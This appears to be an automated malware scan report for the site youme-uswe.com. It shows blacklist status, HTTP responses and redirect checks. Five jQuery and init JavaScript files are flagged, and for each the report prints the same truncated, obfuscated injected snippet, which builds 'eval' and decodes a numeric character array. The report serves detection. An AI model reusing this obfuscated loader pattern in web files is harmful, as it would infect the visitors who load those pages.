Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=youme-uswe.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://youme-uswe.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://youme-uswe.com/ | 200 OK Content-Length: 15186 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://youme-uswe.com/js/jquery.ba-hashchange.min.js | 200 OK Content-Length: 3649 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113 Antivirus reports:
| ||
http://youme-uswe.com/js/jquery.backstretch.js | 200 OK Content-Length: 7800 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113 Antivirus reports:
| ||
http://youme-uswe.com/js/jquery.scrollTo-min.js | 200 OK Content-Length: 4375 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113 Antivirus reports:
| ||
http://youme-uswe.com/js/jquery.localscroll-min.js | 200 OK Content-Length: 3675 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113 Antivirus reports:
| ||
http://youme-uswe.com/js/init.js | 200 OK Content-Length: 3925 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113 Antivirus reports:
| ||
http://youme-uswe.com/test404page.js | 404 Not Found Content-Length: 276 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: youme-uswe.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 19:55:30 GMT
Accept-Ranges: bytes
ETag: "2c2223a-3b52-4c258fbd82640"
Server: Apache
Content-Length: 15186
Content-Type: text/html
Last-Modified: Wed, 13 Jun 2012 11:35:45 GMT
X-Powered-By: PleskLin
...15186 bytes of data.
GET / HTTP/1.1
Host: youme-uswe.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 19:55:30 GMT
Accept-Ranges: bytes
ETag: "2c2223a-3b52-4c258fbd82640"
Server: Apache
Content-Length: 15186
Content-Type: text/html
Last-Modified: Wed, 13 Jun 2012 11:35:45 GMT
X-Powered-By: PleskLin
...15186 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: youme-uswe.com
Referer: http://www.google.com/search?q=youme-uswe.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: youme-uswe.com
Referer: http://www.google.com/search?q=youme-uswe.com
Result:
The result is similar to the first query. There are no suspicious redirects found.